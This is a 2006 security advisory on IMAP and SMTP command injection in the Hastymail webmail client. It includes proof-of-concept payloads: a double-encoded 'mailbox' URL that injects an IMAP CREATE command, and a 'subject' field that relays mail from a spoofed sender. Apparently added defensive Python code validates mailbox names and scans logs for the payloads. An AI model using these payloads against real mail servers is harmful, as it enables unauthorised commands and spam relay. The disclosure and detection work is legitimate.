ISAA-2006-011.txt
Posted Dec 6, 2006
Authored by Vicente Aguilera Diaz

Hastymail does not properly validate the commands and data it transmits to the mail servers during normal use of the application, so an authenticated malicious user can inject arbitrary IMAP/SMTP commands into the mail servers used by Hastymail through parameters the webmail front-end uses in its communication with these servers. This vulnerability has been found in development version 1.5 and stable version 1.0.2.

tags | exploit, arbitrary, imap
SHA-256 | a3e1f1a44710237610d3100801340ec499b4ad76630080fc5ed1b6ef649d4782

=============================================
INTERNET SECURITY AUDITORS ALERT 2006-011
- Original release date: September 28, 2006
- Last revised: December 1, 2006
- Discovered by: Vicente Aguilera Diaz
- Severity: 3/5
=============================================

I. VULNERABILITY
-------------------------
IMAP/SMTP Injection in Hastymail.

II. BACKGROUND
-------------------------
Hastymail is yet another webmail IMAP client written in PHP. Hastymail
is designed for speed, RFC compatibility, simplicity, and security.
Our goal is to create a simple interface with powerful but easy to use
options that make managing your IMAP account effective and fast.

Hastymail is NOT groupware. We are focused on being a functional and
fast webmail client.

The product homepage is http://hastymail.sourceforge.net/

III. DESCRIPTION
-------------------------
Hastymail provides a graphical interface to interact with mail servers
across the IMAP/SMTP protocols.

Hastymail does not properly validate the commands and data it transmits
to the mail servers during normal use of the application (for example,
when accessing a mailbox). As a result, an authenticated malicious user
can inject arbitrary IMAP/SMTP commands into the mail servers used by
Hastymail through parameters the webmail front-end uses in its
communication with these servers.

This is dangerous because injecting such commands allows an intruder
to evade restrictions imposed at the application level and to exploit
vulnerabilities that may exist in the mail servers through IMAP/SMTP
commands.

IV. PROOF OF CONCEPT
-------------------------
== IMAP Injection example (1.5 version) =============
Hastymail Vulnerable parameter: "mailbox" (and possibly others)

When a user accesses a folder (for example, "INBOX"), the browser
issues a GET request such as:
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX

A malicious user can modify the value of the "mailbox" parameter and
inject any IMAP command.
The IMAP command injection has the following structure:
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0a<ID>%20<INJECT_IMAP_COMMAND_HERE>%0D%0A<ID>%20SELECT%20%2522INBOX
Note that double URL encoding is used to encode the quote character
(").

Example:
Injection of the CREATE IMAP command across the "mailbox" parameter:
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0aA0003%20CREATE%2522INBOX.vad
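The root cause above is that a user-controlled mailbox name is pasted, unchecked, into a quoted IMAP argument, so a quote plus CRLF starts a second command line. The following is an added example (not Hastymail's code) that decodes the advisory's double-encoded value, shows the unsafe interpolation pattern next to a hardened builder that rejects CR/LF/NUL and escapes the name as an RFC 3501 quoted string; `naive_select`, `safe_select` and the tag values are assumptions for illustration.

```python
import re
from urllib.parse import unquote

# RFC 3501 quoted strings may not contain CR, LF or NUL; '"' and '\' must be backslash-escaped.
_FORBIDDEN = re.compile(r"[\r\n\x00]")

def decode_param(raw: str) -> str:
    """Decode a query-string value twice, mirroring the double URL encoding
    (%2522 -> %22 -> ") used in the advisory's request."""
    return unquote(unquote(raw))

def naive_select(tag: str, mailbox: str) -> str:
    """The unsafe pattern: interpolate the name between quotes with no checks.
    A value containing '"' + CRLF yields a second, attacker-chosen command line."""
    return f'{tag} SELECT "{mailbox}"\r\n'

def mailbox_is_valid(value: str) -> bool:
    """A mailbox name that can be sent safely contains no line-ending or NUL bytes."""
    return _FORBIDDEN.search(value) is None

def imap_quoted(value: str) -> str:
    """Encode value as an RFC 3501 quoted string, or refuse if it cannot be one."""
    if not mailbox_is_valid(value):
        raise ValueError("CR, LF and NUL are not allowed in a mailbox name")
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'

def safe_select(tag: str, mailbox: str) -> str:
    """Build exactly one SELECT command; the tag is generated server-side, never from user input."""
    if not re.fullmatch(r"[A-Za-z0-9]+", tag):
        raise ValueError("malformed IMAP tag")
    return f"{tag} SELECT {imap_quoted(mailbox)}\r\n"

if __name__ == "__main__":
    # Constructed input: the advisory's CREATE payload as it arrives in the query string.
    injected = decode_param("INBOX%2522%0d%0aA0003%20CREATE%2522INBOX.vad")
    print(repr(naive_select("A0002", injected)))   # two command lines: SELECT, then CREATE
    try:
        safe_select("A0002", injected)
    except ValueError as exc:
        print("rejected:", exc)
```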

== SMTP Injection example (1.5 version) =============
Hastymail Vulnerable parameter: "subject" (and possibly others)

When a user sends a message, the browser issues a POST request like:
POST http://<webserver>/<path_to_hastymail>/html/compose.php HTTP/1.1

...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"

Proof of Concept
-----------------------------84060780712450133071594948441
...

A malicious user can modify the value of the "subject" parameter and
inject any SMTP command.
Example: relaying a message from a non-existent e-mail address:

...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"

Proof of Concept
.
mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in Hastymail
.

-----------------------------84060780712450133071594948441
...
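Both proofs of concept depend on a CR/LF pair reaching the mail server inside a parameter value, sometimes hidden behind one or two rounds of URL encoding. As an added detection example (not from the advisory or the Hastymail project), the following scans constructed Apache combined-format access-log lines for watched parameters whose value contains CR or LF at any decoding depth up to two; the log lines, the `SAMPLE_LOG` constant and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Dec/2006:10:00:01 +0100] "GET /hastymail/html/mailbox.php?id=abc&mailbox=INBOX HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Dec/2006:10:00:07 +0100] "GET /hastymail/html/mailbox.php?id=abc&mailbox=INBOX%2522%0d%0aA0003%20CREATE%2522INBOX.vad HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Dec/2006:10:00:09 +0100] "GET /hastymail/html/mailbox.php?id=abc&mailbox=INBOX%250d%250aA0004%20NOOP HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Extract client IP, timestamp, method and request target from one combined-format line.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

def has_crlf_after_decoding(value: str, rounds: int = 2) -> bool:
    """True if CR or LF appears in the raw value or after up to `rounds` URL decodings.
    Depth 2 catches the double-encoded form (%250d%250a -> %0d%0a -> CRLF)."""
    for _ in range(rounds + 1):
        if "\r" in value or "\n" in value:
            return True
        decoded = unquote(value)
        if decoded == value:          # nothing left to decode
            return False
        value = decoded
    return False

def scan_log(text: str, params=("mailbox", "subject")) -> list:
    """Return one finding per request whose watched query parameter decodes to a CR/LF."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")   # keep the raw (still-encoded) value
            if name in params and has_crlf_after_decoding(raw):
                findings.append({"ip": m["ip"], "ts": m["ts"], "param": name, "raw": raw})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} param={f['param']} raw={f['raw']}")
```

The "subject" value in the SMTP example travels in a POST body, which a standard access log does not record; catching that case needs request-body logging at the application or a front-end filter applying the same decode-and-check rule.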

V. BUSINESS IMPACT
-------------------------
The IMAP/SMTP command injection allows an attacker to exploit
vulnerabilities in the IMAP/SMTP servers and to evade all restrictions
at the application layer.

VI. SYSTEMS AFFECTED
-------------------------
This vulnerability has been tested on:
- Last development version: 1.5, released on February 17, 2006
- Last stable version: 1.0.2, August 23, 2004

Possibly all versions are affected by this vulnerability.

VII. SOLUTION
-------------------------
Apply the patch: http://hastymail.sourceforge.net/security.php

VIII. REFERENCES
-------------------------
http://hastymail.sourceforge.net/security.php

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Vicente Aguilera Diaz (vaguilera=at=isecauditors=dot=com).

X. REVISION HISTORY
-------------------------
September 28, 2006: Initial release
October 3, 2006: Project admin response
October 9, 2006: Project admin published the patch for versions 1.5
and 1.0.2.

XI. DISCLOSURE TIMELINE
-------------------------
September 28, 2006: Vulnerability discovered by Vicente Aguilera Diaz,
Internet Security Auditors (www.isecauditors.com)
December 1, 2006: Advisory published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.